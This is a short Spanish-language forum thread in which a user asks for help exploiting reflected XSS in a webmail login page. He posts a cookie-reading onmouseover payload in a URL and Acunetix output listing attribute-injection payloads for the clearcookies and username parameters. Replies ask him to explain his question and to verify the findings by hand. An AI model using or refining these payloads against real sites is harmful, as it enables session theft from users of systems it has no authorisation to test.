Buenas, en un webmail, me enconré con unos xss que yo les digo "raros" uno es por post y el otro es por get... por post me imagino que debo usar un proxy para poder editar y enviar el xss por post... mi duda es que los marca en el evento "onmouseover" y si soy honesto creo que necesitaría algunos ejemplos.
intento por get failed:
https://login.server.net/index.php?clearcookies=1%27%3E%3Ca+onmouseover%3Dalert%28document.cookie%29%3Exxs%3C%2Fa%3E&app=wbe
y bueno acunetix dice esto:
- URL encoded GET input clearcookies was set to 1' onmouseover=prompt(981263) bad='
- URL encoded GET input clearcookies was set to 1' onmouseover=prompt(908631) bad='
- URL encoded GET input clearcookies was set to 1' onmouseover=prompt(907592) bad='
username
- URL encoded POST input username was set to tsklhfyf%40server.com.mx" onmouseover=prompt(910804) bad="
Discúlpame, pero no entiendo bien cual es tu duda. Si no sabes como encontrar el XSS, no sabes el vector o que cosa?
Podrías explicarte un poco mas.
Saludos,, Cronos.-
No entiendo men explicate mejor para que te podamos ayudar
si te dice q ese es el vector de ataque pues lo q haces es probar si es verdad sino pues es un "falso positivo" y como te dices deja de usar scanners q eso es para los noobs XDD